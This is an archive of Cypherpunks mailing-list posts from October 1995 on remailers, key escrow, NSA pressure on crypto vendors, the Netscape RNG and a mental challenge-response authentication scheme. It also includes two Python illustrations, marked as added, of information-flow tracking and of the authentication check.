> the cost to maintain anonymity and the cost to evaluate reputations.
. . .
> The second big part of transaction cost in an anonymous market is 
> reputation evaluation.  Of course, normal, everyday transactions require 
> reputations to be evaluated.  However, more effort and cost will be 
> expanded on these evaluations in an anonymous market because the effects 
> of misevaluations will be much more damaging.  Reputations must be 
> constantly reevaluated, as pseudonyms are easily transferred.  Since no 
> good theories of reputation currently exist, these evaluations are 
> difficult to automate.  Perhaps theoretical advances can make these 
> evaluations easier and/or more accurate.  However there does not appear 
> to be any major research effort in this area.

This is only true if you assume everyone will do their own
reputation evaluation.  This is a third-party insurer problem,
really.  Either a "Lloyds of London" or a "Good Housekeeping" 
model would do the trick.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Oct 95 00:40:35 PDT
To: remailer-operators@c2.org
Subject: RE: robo remailerRE: robo remailer
In-Reply-To: <199510142157.WAA25454@utopia.hacktic.nl>
Message-ID: <199510160740.IAA01621@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


nobody@REPLAY.COM (Anonymous) wrote:

> Is the remailer "robo@c2.org" a PGP remailer?
> In the remailer-list, it is not listed as such and yet it has a
> public PGP key (dated 5/7/95)?  Also, is it robo or ROBO, or 
> doesn't the case matter?

From what I heard last week, the remailer operator's account at
c2.org expired and was cancelled, thus the remailer is down.
Previously, it had been a full-fledged cypherpunk-type remailer,
with Type II (Mixmaster) capabilities, to boot.

Such are the uncertainties of using remailers.  What would have been
nice, of course, would have been for Sameer (sameer@c2.org), or
whoever runs Community ConneXion, to post a bulletin here giving
everyone a few days' notice before pulling the plug on this
remailer.  Undoubtedly, people are still chaining through it and
wondering why their messages/posts are not showing up.

NOTE:  People with anon reply blocks from alpha.c2.org that chained
through robo need to replace them, or risk lost messages!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Leishman <jleishma@ozemail.com.au>
Date: Sun, 15 Oct 95 16:45:55 PDT
To: cypherpunks@toad.com
Subject: JOin List request - help please
Message-ID: <199510152345.JAA28781@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Have tried on MANY occasions to join your list. The results are commonly,
in variations of;
Date: Tue, 12 Sep 95 15:44:37 PDT
To: jleishma@ozemail.com.au
From: Majordomo@toad.com
Subject: Your Majordomo request results: Re: Your Majordomo request results:
Reply-To: Majordomo@toad.com

--

Your request of Majordomo was:
>>>> subscribe Cypherpunks
**** subscribe: unknown list 'Cypherpunks'.

Please please, could I be joined <sob>   <g>

 ---------------------------------------------------
  >>--> -*-_|\                  John Leishman in Tropical Darwin
       /      \            Wk (61) (089) 81 8155 Hm (61 (089) 81 9697
       \_.--._/            Mobile (61) 018 089 631 Fax (61)(089) 819415
             v            E-Mail jleishma@ozemail.com.au 100026.157@compuserve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Mon, 16 Oct 95 06:27:13 PDT
To: jim@acm.org
Subject: Re: Why commercial key escrow? [Re: My chat with Goeff Greiveldinger]
In-Reply-To: <199510160257.TAA23550@mycroft.rand.org>
Message-ID: <199510161311.NAA06302@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> As a data point, Dorothy Denning is increasingly pessimistic that
> this plan will in fact result in the same weak or escrowed system
> being used domestically; if it doesn't, that presumably triggers
> Louis Freeh to head back to the Hill for more legislation.

Yup, those of us who already paid the up-front cost to build two
versions of our products are not about to *weaken* our domestic
version just to go back to having only one version.

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMIJZO7T+rHlVUGpxAQGJJwQAgewBBehZWJMDN4gl2BBeZKEeQqpF86l5
GCqwXDcZEPjeFnNg4P2bIjHZ7UAu/DNMcABN8ZBmqusAkSEa28m3MFigIcTdnrO7
vKM8LuKj8rC95ig6hjJ20RitUF820BnQjRsIBQafa96J9rav1nZpX2UeZ8Ad9l6y
BfTjGVqAEig=
=zSSz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 16 Oct 95 09:21:14 PDT
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: robo remailer
In-Reply-To: <199510160740.IAA01621@utopia.hacktic.nl>
Message-ID: <199510161615.JAA02394@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Such are the uncertainties of using remailers.  What would have been
> nice, of course, would have been for Sameer (sameer@c2.org), or
> whoever runs Community ConneXion, to post a bulletin here giving
> everyone a few days' notice before pulling the plug on this
> remailer.  Undoubtedly, people are still chaining through it and
> wondering why their messages/posts are not showing up.
> 

	Account cancellations are automated. The account holder is
notified of pending deactivation 14, 7, and 3 days before the account
is deactivated. It is the remailer-operator's responsibility to notify
the world that the remailer will be going down. It is not my
responsibility to keep track of which remailers are running on c2.org
and which aren't.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sun, 15 Oct 95 18:42:30 PDT
To: tedwards@Glue.umd.edu (Thomas Grant Edwards)
Subject: Re: PA Remailer Concerns
In-Reply-To: <Pine.SUN.3.91.951015155654.19623C-100000@volt.isr.umd.edu>
Message-ID: <199510152238.AA43670@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I am sure no PA state legislator knows what an anonymous remailer is.
>They have just made them illegal though.  The question is, will the police
>ever figure out what they are, and will they ever bother to selectively
>enforce the law.

More likely the law will be used when a remailer operator won't play ball with
the local LEA and surrender any existing logs. Then the LEA can simply throw
the operator into a court under this legislation.

If (when?) something serious is perpetrated and planned using a remailer then
they will have the motivation to shut them down.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be my own.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Mon, 16 Oct 95 06:33:26 PDT
To: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: [NOISE] PGP out of RAM
Message-ID: <199510161333.JAA14631@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 10.16.1995 -0400, SINCLAIR  DOUGLAS N wrote:
>It seems PGP has been too successful.  I downloaded the entire keyring
>from keys.pgp.net; it's almost 9Mb of ASCII armour.  However, I can't
>get PGP for DOS to process the files.  It, understandably, gives me an
>Out Of Memory error.  Is there any sneaky way of getting around this,
>barring the obvious switch to PGP for Linux?  It seems PGP is constrained
>to the basic DOS 640Kb, or 704Kb if I remove my VGA card.

Use the 32-bit DOS version; that solves most memory problems.  (Caveat: I
haven't tried rings that large myself, so if you're already using the 32-bit
version then I'm wrong.)

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 16 Oct 95 02:41:05 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: PA Remailer Concerns
In-Reply-To: <aca715081d0210044fe2@[205.199.118.202]>
Message-ID: <9510160939.AA08616@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:
[...]
 > One of the Four Horseman, probably.
[...]

I feel really dumb, but what is that "Four Horseman" thing ?
[i saw that several times quoted on the list but I never understood,
nor found in faq,...]

Thx in advance for enlightening me

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

munitions break $400 million in gold Chirac mururoa NORAD genetic




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 16 Oct 95 10:22:48 PDT
To: cypherpunks@toad.com
Subject: The NSA Visits Compendium
Message-ID: <aca7dbbd26021004fefd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



* Does the NSA really visit companies planning to include crypto modules
and ask them to weaken or remove the crypto modules?

* How do such visits occur?

* What happens if a person or company simply refuses to meet with the Men
in Black and says "This is a free country--get lost!"?

* What pressures are brought to bear on companies to induce them to weaken
crypto, even for domestic-only use, or to remove hooks?

* Is there concrete evidence of these things?

We've all heard that the NSA sends representatives to software companies
planning to include crypto or crypto "hooks" in software. There have been
anecdotal reports of visits to many software companies.

The question is: how _real_ are these reports and what are the mechanics of
the visits? Are they urban legends, or real?

I asked these questions at the last Bay Area Cypherpunks meeting, and got
some interesting responses. In particular, I was interested in the
comparison to the other report about academic papers being submitted to a
review board, since the late 1970s. Whit Diffie of Sun and Matt Blaze of
AT&T (or, as Matt put it, maybe BT&T or CT&T, depending) shared their
experiences. They confirmed that such a panel _does_ exist, but that it is
fairly ineffectual. Apparently many people publish without approval.

(Anyway, I'm citing this as a parallel to what I'm looking for: direct
confirmation of NSA pressure and visits.)

I have volunteered to compile a compendium of reports, with or without
names attached (see details below), to pin down the extent of NSA coercion
or "subtle encouragement" of companies.

I believe this is a valid "Cypherpunks-type project," as it is aimed at
using the Net to compile a listing of experiences software developers have
had.

To kick things off, I'll start the list below:

---

Example: Large relational data base company.

NSA Actions: Visits on a regular basis by two NSA representatives ("always
two"). Pressured them to drop plans for a strong domestic crypto module.

Source: Personally told to me by programmer at the company, 1995-10-14. He
wishes the company not to be named.

Description: The NSA was concerned about plans the company had for a
domestic-only 128-bit RC4 usage, and "sat on" the company's CJ request for
an exportable version of their product using 40-bit DES. After hearing
nothing for a long while, and pestering the NSA (or maybe the State
Department), the company finally backed down on the plans for the 128-bit
RC4 use, told the NSA this, and then the government rapidly approved the
40-bit version for export. Coincidence?

---

So, send me your examples. Supply as much detail as you can, including
company names if possible. I'll accept "unnamed sources" if they are
_primary_ sources, but no "friend of a friend told me that...," unless the
details look very convincing.

Use remailers if you wish. Use my public key if you wish, too, though
remailers accomplish the same thing, at least for getting the details to me
anonymously.

My public key is:

pub  1024/54E7483F 1992/11/20 Timothy C. May <tcmay@netcom.com> 11-20-92
          Key fingerprint =  8C 79 1C 1B 6F 32 A1 D1  65 FB 5F 57 50 6D D3 28


(I don't have MacPGP integrated into Eudora Pro---perhaps the NSA paid
Qualcomm a visit?--so I'm not a huge fan of getting PGP-encrypted messages
unless there's a real need.)

I'll be releasing reports on this on a regular basis. The next one when
I've accumulated several examples.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Mon, 16 Oct 95 10:50:04 PDT
To: cypherpunks@toad.com
Subject: Re: NEW Netscape RNG hole
Message-ID: <30829B5D.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


[I sent this to the wrong address last week. A side effect seems to be that
I now have an anonymous ID.]

RingZero wrote:

> However, Netscape had not revealed enough information about
> their RNG to allow myself or other reviewers to determine how
> critical it was. If, for example, this seeding function were
> called once every time a secure connection were established,
> losing a handle would be a major problem.

Yes. The README was not as explicit on this point as my original
message. SEC_SystemInfoForRNG is indeed among the global initialization
routines.

> This seems like a good reason to ask for the code for
> SEC_RandomUpdate().

As was stated in the README, I cannot publish that code. It's derived
from (and remarkably similar to) code that Netscape has licensed. It's
not ours to divulge.

> You show us from what sources you gather bits,
> but you don't show us how you mix them or, for that matter,
> stream out "random" bits.

There seems to be little point in extracting isolated lines of
code out of the source to "prove" that we use the functions we
claim to use. If you have familiarity with RSAREF or the BSAFE
toolkit, you will be able to see how we mix and extract the
"random" bits.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Mon, 16 Oct 95 03:27:58 PDT
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: [NOISE] was Re: java security concerns
In-Reply-To: <199510100639.BAA19818@snoopy.vetmed.auburn.edu>
Message-ID: <199510161024.LAA11745@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| This is a bit off-topic, but hopefully interesting.
| 
| Rather than trying to prove a program to be correct (which I agree is doomed
| to failure for the foreseeable future for all but trivial programs), perhaps
| it would be useful to have an automated theorem-prover to try to deduce
| "interesting things" about certain programs such as "this program always
| bounds-checks its input", "this program allows writes to arbitrary files on
| lines x, y, and z", "this program halts". (:>)

I'm doing a PhD on runtime information flow analysis of programs,
tracking each datum and who has contributed to it. Each datum has an
associated set of subjects that has contributed, and each system call
checks whether all subjects in the set are granted the call or not.
This tracking is done by compiled-in 'shadowing' code, compiled in
into the binary, and the code is inserted based on something similar
to 'data flow' analysis.

It's messy, but I think it might work out in the end. This kind of
access control is much better suited for extensive communication
between different subjects than the current paradigm of having
an owner of the process. 

With the current concept, it is imperative for the process to
filter and control each datum entering the process, since it might
be 'hostile'. (The current concept of identity is really based on
*partitioning* an expensive computing facility, without communication
between the different partitions.) I believe this task to be too 
burdening in the long run.

With "my approach", you can accept any input without fear, since
it will be stopped when your application does the syscall.

I just started, so I don't have anything concrete yet. I'll have it 
in five years! :-)

| Obviously (as the last example illustrates), this isn't perfect because
| something can be true without being provable.

Why ever prove anything else but a trace of actual execution? This is
usually almost trivial, you don't have the problem of calculating the
proof for all possible branches, etc...

| Further, it's likely that assumptions must be made about system calls, 
| libraries, and the  ways in which they interact.  

It might be fruitful to do it for an actual system, although I think
that this "paradigm"-shift will influence a lot of the design of the
system.

| However, I think such a tool would be useful because 
| it may quickly point out things not obvious to (most) humans
| and getting some idea of what can't be deduced and why would be instructive.

Tell me if you're planning to do something along these lines, it would
be most interesting.

Regards,
	Christian
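
The per-datum contributor tracking described in the message above, as an added Python illustration (not the poster's code or design): each value carries the set of subjects that contributed to it, and a call is refused unless every contributor holds a grant for it. The class names, the grant table, the sample paths and the use of operator overloading in place of compiled-in shadowing code are all assumptions made for the example.

```python
class Denied(PermissionError):
    """Raised when a contributor to a call's arguments lacks a grant for it."""


class Labeled:
    """A datum plus the set of subjects whose input contributed to it."""

    def __init__(self, value, subjects=()):
        self.value = value
        self.subjects = frozenset(subjects)

    @staticmethod
    def lift(x):
        # Constants written into the program carry no contributor.
        return x if isinstance(x, Labeled) else Labeled(x)

    def _join(self, other, op):
        other = Labeled.lift(other)
        # Shadow step: the result inherits every contributor of both operands.
        return Labeled(op(self.value, other.value),
                       self.subjects | other.subjects)

    # Only explicit data flow through "+" is tracked here; flows through
    # branches (implicit flows) are outside what this example covers.
    def __add__(self, other):
        return self._join(other, lambda a, b: a + b)

    def __radd__(self, other):
        return Labeled.lift(other)._join(self, lambda a, b: a + b)


class Monitor:
    """Checks each call against the grants of every contributing subject."""

    def __init__(self, grants):
        self.grants = {s: frozenset(calls) for s, calls in grants.items()}
        self.performed = []  # stands in for actually executing the call

    def syscall(self, name, *args):
        args = [Labeled.lift(a) for a in args]
        contributors = frozenset().union(*(a.subjects for a in args))
        refused = sorted(s for s in contributors
                         if name not in self.grants.get(s, frozenset()))
        if refused:
            raise Denied(f"{name} refused: no grant for {', '.join(refused)}")
        self.performed.append((name, tuple(a.value for a in args)))
        return contributors


def demo():
    # Constructed scenario: alice runs the process, mallory supplies input.
    mon = Monitor({"alice": {"read", "write"}, "mallory": {"read"}})
    base = Labeled("/home/alice/notes/", {"alice"})
    name = Labeled("../.profile", {"mallory"})  # accepted without filtering
    path = base + name
    results = {"path_subjects": path.subjects}
    mon.syscall("read", path)  # both contributors may read
    try:
        mon.syscall("write", path, Labeled("data", {"alice"}))
        results["write"] = "allowed"
    except Denied as exc:
        results["write"] = str(exc)
    # Data that only alice contributed to is still writable.
    mon.syscall("write", base + "todo.txt", Labeled("data", {"alice"}))
    results["performed"] = mon.performed
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```
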




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Mon, 16 Oct 95 03:56:12 PDT
To: dl@hplyot.obspm.fr
Subject: Four Horsemen (was Re: PA Remailer Concerns)
In-Reply-To: <9510160939.AA08616@hplyot.obspm.fr>
Message-ID: <3541.9510161053@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Laurent Demailly <dl@hplyot.obspm.fr> writes: 
> I feel really dumb, but what is that "Four Horseman" thing ?
> [i saw that several times quoted on the list but I never understood,
> nor found in faq,...]

You sure about the faq, grepping reveals:

    8.3.4. "How will privacy and anonymity be attacked?"
[...]
           - like so many other "computer hacker" items, as a tool for
              the "Four Horsemen": drug-dealers, money-launderers,
              terrorists, and pedophiles.

   17.5.7. "What limits on the Net are being proposed?"
[...]
           + Newspapers are complaining about the Four Horsemen of the
              Infocalypse:
             - terrorists, pedophiles, drug dealers, and money
                launderers

ie the idea that hysterical media demonization is used as a tool to
justify the net, a witch hunt.  A tactic in general: if you can make
something look bad in the eyes of the world, if you can sway public
opinion, you can do what you wish, and be applauded for it.  So, the
spread of untrue, or greatly exaggerated stories, as a conscious ploy
to obtain this effect.  Popular tactic of Freeh at the moment.  "Oh
gosh people can get *bomb* making information on the internet, we must
put a stop to this".

How to get what you want in 4 easy stages:

1. Have a target "thing" you wish to stop, yet lack any moral, or
practical reasons for doing so?

2. Pick a fear common to lots of people, something that will evoke a
gut reaction: terrorists, pedophiles, serial killers.

3. Scream loudly to the media that "thing" is being used by
perpetrators.  (Don't worry if this is true, or common to all other
things, or less common with "thing" than with other long established
systems - payphones, paper mail, private hotel rooms, lack of bugs in
all houses etc)

4. Say that the only way to stop perpetrators is to close down
"thing", or to regulate it to death, or to have laws forcing en masse
tapability of all private communications on "thing".  Don't worry if
communicating on "thing" is a constitutionally protected right, if you
have done a good job in choosing and publicising the horsemen in 2, no
one will notice, they will be too busy clamouring for you to save them
from the supposed evils.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Oct 95 04:32:06 PDT
To: cypherpunks@toad.com
Subject: Japan-CIA
Message-ID: <199510161131.MAA04458@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Japan-CIA

   	
Tokyo (AP) -- Japan said that its relations with Washington could
be seriously damaged if a report that the CIA spied on Japanese
representatives at auto talks proves true. The New York Times
reported Sunday that the CIA eavesdropped on conversations between
Japanese negotiators and automakers during the talks in Geneva this
year, reporting the results daily to U.S. Trade Representative
Mickey Kantor. According to the report, Kantor was provided with
summaries of conversations between Japanese bureaucrats and
executives from Toyota Motor Corp. and Nissan Motor Co. Toyota
called the alleged eavesdropping ``unthinkable,'' but refused to
comment further.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 16 Oct 95 13:52:40 PDT
To: cypherpunks@toad.com
Subject: Human ID through insecure channel
Message-ID: <199510162051.NAA03429@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is an example of the Matsumoto/Imai scheme for identifying yourself
via a shared secret over an insecure channel, a system which is simple
enough to be done in your head but which can withstand repeated
observations by an adversary without being broken.

The idea is that there is a challenge and response.  In one example they
give, the challenge is:

28517364

What happens here is that there are two secrets.  The first is which
characters are special in the challenge.  In this example let us assume
that is 1,2,4,6.  The second is a secret response string of the same
length; in this case let it be 3124.  Now what you do is to enter a
response string of the same length as the challenge.  Only the characters
in the same spot as those which held special characters in the challenge
(1,2,4,6) matter, and those four should spell out the secret word 3124.
So a correct challenge and response could be:

*  *  **
28517364
34312124

I have marked the spots in the challenge which use 1,2,4 or 6, and if you
look at the response in those marked spots you have 3124.

This is not too bad, but as more realistic examples the authors suggest
much larger strings.  In the first example the alphabet of characters
would be the lower case letters and the digits 0-9, 36 characters in all.
The challenge string would also be 36 characters long.  Your secret word
would be 18 letters, but the response alphabet is only the binary digits 0
and 1.

So, suppose the special characters are befhjkmnpqtvwz1468, and the secret
word is 011010111010110101.  The secret can be memorized in hex as 1aeb5.
This is not so much to remember, but try applying it in practice.  Here
is a challenge:

5fmp67yez2rnq4wd3uthsg1i8l09bkoavjxc

To create the response, we go across, putting down random 0's and 1's,
until we recognize our special characters.  The first is f, the 2nd
letter.  So we are careful to put down 0 there since that is the first of
our secret word letters.  Then the m is special, so we put down 1; the p
and 6 are special too, so we put down 10.  Then the 7 and y are not
special so we put random characters down there, and so on.  So our
initial response might be:

0011010...

Try coming up with the rest of the response, and see if you think you
could learn to do this by memory.

Another example the authors offer uses a somewhat shorter secret word and
set of special characters, but as a tradeoff the challenge alphabet is 50
characters (upper and lower case letters, say, minus 2 of them), and the
challenge is 50 characters long.  The secret word need be only 10
letters, and the response alphabet is 3 letters, say 0, 1 and 2.  So
suppose the special characters are bruzCEHMOQ, and the secret word is
2012100211.  Here is a challenge:

tJWTEjrkiqxsfmdAelvDIPguonKzFUHXwSaNVcpBQhGybRLMOC

Coming up with the response is left as an exercise for the reader.

Hal
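
Added example (not part of Hal's message or of the paper it summarizes): a Python sketch of the challenge-response check as the message describes it, run on the three challenges quoted above. The function names and the use of Python's secrets module for the filler symbols are assumptions of this example.

```python
import hmac
import secrets
from fractions import Fraction

# The three examples quoted in the message: (challenge, special characters, secret word).
TOY = ("28517364", "1246", "3124")
BINARY_36 = ("5fmp67yez2rnq4wd3uthsg1i8l09bkoavjxc",
             "befhjkmnpqtvwz1468", "011010111010110101")
TERNARY_50 = ("tJWTEjrkiqxsfmdAelvDIPguonKzFUHXwSaNVcpBQhGybRLMOC",
              "bruzCEHMOQ", "2012100211")


def special_positions(challenge, special):
    """Indexes in the challenge that hold one of the user's special characters."""
    return [i for i, ch in enumerate(challenge) if ch in special]


def make_response(challenge, special, secret, alphabet):
    """Build a response: random filler everywhere, except that the special
    positions, read left to right, spell out the secret word."""
    positions = special_positions(challenge, special)
    if len(positions) != len(secret):
        raise ValueError("challenge must contain exactly one slot per secret symbol")
    response = [secrets.choice(alphabet) for _ in challenge]
    for index, symbol in zip(positions, secret):
        response[index] = symbol
    return "".join(response)


def verify(challenge, response, special, secret):
    """Host-side check: only the special positions of the response matter."""
    if len(response) != len(challenge):
        return False
    positions = special_positions(challenge, special)
    if len(positions) != len(secret):
        return False
    picked = "".join(response[i] for i in positions)
    # Constant-time comparison so the check does not leak how many symbols matched.
    return hmac.compare_digest(picked.encode(), secret.encode())


def blind_guess_probability(secret, alphabet):
    """Chance that a uniformly random response passes a single challenge."""
    return Fraction(1, len(alphabet) ** len(secret))


if __name__ == "__main__":
    # The worked response from the message passes the check.
    print(verify(TOY[0], "34312124", TOY[1], TOY[2]))
    for (challenge, special, secret), alphabet in ((BINARY_36, "01"), (TERNARY_50, "012")):
        response = make_response(challenge, special, secret, alphabet)
        print(challenge)
        print(response, verify(challenge, response, special, secret),
              blind_guess_probability(secret, alphabet))
```
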




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 16 Oct 95 10:42:27 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: The NSA Visits Compendium
Message-ID: <aca849e3050210043eb7@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



I don't know anything about uninvited visits, but I did once interview the
designer of a major product about getting an export license. He said that
the NSA were fairly thorough in their review of the product. The most
interesting thing that he mentioned was that the company had to guarantee
that the data would never be encrypted sequentially by two _different_
algorithms. Apparently double encryption by 40-bit RC-4 was okay, but using
different algorithms was verboten. This seemed odd to me at the time and I
asked him twice about it. He agreed that it was weird, but they had no
problem with guaranteeing it.

This led me to these notions:

*) Maybe double or triple DES isn't that great an idea. Maybe the NSA knows
some neat algorithms that can create group-like actions even if the
encryption process isn't a group.

*) Maybe there was a communications problem and no one knew what was being
asked.

*) Maybe the cryptanalysis boys never really talked that much to the folks
who go around regulating export. After all, denying export licenses for
small details is like telling people that certain small details can
confound analysis. This is a leak of information from the NSA which doesn't
seem to like these things.

In general, I think communications between the NSA and the companies begin
when software companies make unofficial inquiries about what is exportable.


-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Oct 95 14:40:45 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: The NSA Visits Compendium
In-Reply-To: <aca7dbbd26021004fefd@[205.199.118.202]>
Message-ID: <199510162105.OAA05055@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



re: "Men In Black Study"

I think this is a really excellent project, for the main reason that
the NSA lives and dies by a "nobody is noticing" modus operandi (relative
to congressmen, the public, companies, foreign governments, etc.). it
is a sort of "security through obscurity" that can be defeated.  this
has been a topic that has long fascinated me.

I suggest however that the scope of the survey be expanded to the FBI.
there are reports the FBI visited Lotus a long time ago to ask them
to put in a "back door" into their encryption software, because it
was too strong. it seems to me this is very similar to the survey
questions. also keep in mind that the NSA loves to use "front agencies"
like NIST to do their dirty work. so it might be hard to detect an
"NSA visit".

however the NSA like all intelligence agencies is really brilliant in
intimidation. I think one would find that these situations are going
to go "unreported" because the NSA may be leaving the impression that
"not following our suggestion" is one sin, but that "screaming about
this in the public" is going to be another liability. that is the coercion
tactics that they are legendary for, IMHO. "you must do this, but we
can't tell you why. you can't ask anyone else about this, either".

I suspect that the entire crypto industry has been sabotaged in a lot
of subtle ways by the NSA doing this, and nobody is the wiser. I hope
people realize that by not reporting this, you contribute to the problem,
not the solution. as Thomas Paine said, roughly, "the power of tyranny
lies solely in the fear of rebellion".

a study on this would be very significant. (from what I understand, the NSA
tried to do this with public key crypto, i.e. suppress it at the
publication stage. a professor gave a lecture on this in one of my
classes and said that it was even covered in the NYT at the time.
unfortunately I lost the date. I believe it was a long time ago
(maybe the 80's or even the 70's). hopefully someone else has an
encyclopedic brain.)

in fact, we might be able to get Levy or Markoff to write on this subject
if we can get any significant results.  that would be *hot*. they could
put a great spin on it, like "the netscape bugs are a problem, but an
even more horrifying and unimaginable thing going on is..."  if the NSA
has visited Netscape, that's virtually an article right there!!

>* Does the NSA really visit companies planning to include crypto modules
>and ask them to weaken or remove the crypto modules?

a rumor was floating around that they visited Mosaic designers.

>* What pressures are brought to bear on companies to induce them to weaken
>crypto, even for domestic-only use, or to remove hooks?

probably just the insinuation that they may be liable. you know the lovely
intimidation tactic, "what you are doing may have LIABILITY". of course
everyone does all kinds of ridiculous things, because, after all, one
might be LIABLE after doing them.

>* Is there concrete evidence of these things?

it is in the NSA's interest to cover up any evidence, and furthermore to
suggest that their program, if it exists, is totally ineffective. I think
otherwise. I think it is a prime dirty secret of the NSA and a major
public relations liability that ought to be exploited to the utter,
full extent by cypherpunks.

[Blaze etc.]
> They confirmed that such a panel _does_ exist, but that it is
>fairly ineffectual. Apparently many people publish without approval.

however it may be more effective with commercial companies worried about
liability. sometimes the slightest whiff of liability sends a company
screaming for cover and not touching an entire area with a ten foot pole.
I wonder if cellular phone encryption in the US has been delayed for this
reason.

>NSA Actions: Visits on a regular basis by two NSA representatives ("always
>two"). Pressured them to drop plans for a strong domestic crypto module.
>
>Source: Personally told to me by programmer at the company, 1995-10-14. He
>wishes the company not to be named.

unfortunately, whenever someone says, "don't name my company", it loses
effectiveness. I would like to point out that people are directly contributing
to their erosion of rights by this behavior that suggests that they
are doing something lawbreaking that they are ashamed of.

well, good luck with the study. I'll do what I can to publicize it <g>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William McVey - wam <wamcvey@fedex.com>
Date: Mon, 16 Oct 95 12:15:25 PDT
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Let's refocus... (was Re: Netscape rewards are an insult)
Message-ID: <199510161915.AA06148@gateway.fedex.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Zamick wrote:
>
>On the one hand, many people here see strengthening security and encryption
>in use as a no-holds benefit. The more that is out there, the better it is,
>and the more it's in use, the better off things will be.
>
>On the other hand, Netscape is a hot stock company. It's ok to work for
>recognition, and to donate time for the betterment of the community even if
>it profits others. (Eventually such things come around, which is the
>classic value of a net reputation.) However, when sudden, large profits
>hinge on your work, it is harder to take the philosophical route.

As a (partial) solution to this problem, how about if rather than continuing
to poke holes at netscape, we start an effort to bring one of the free Web
Browsers, say Mosaic or Athena into line so it can be used instead of Netscape
to perform secure transactions.  This way our efforts are still oriented
toward better personal encryption and better transaction security, but our
work doesn't so directly benefit a for-profit company (something I have 
very little interest in doing without being employed by that company.)

Personally, I see one of the cypherpunk's main objectives is to increase the
security and privacy of people using computers and networks.  I think this
effort would further that goal.   Sure, Mosaic may not have 75% of the market
share on Web browsers, but that's probably because it is missing some basic
functionality like encryption.

 -- William




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
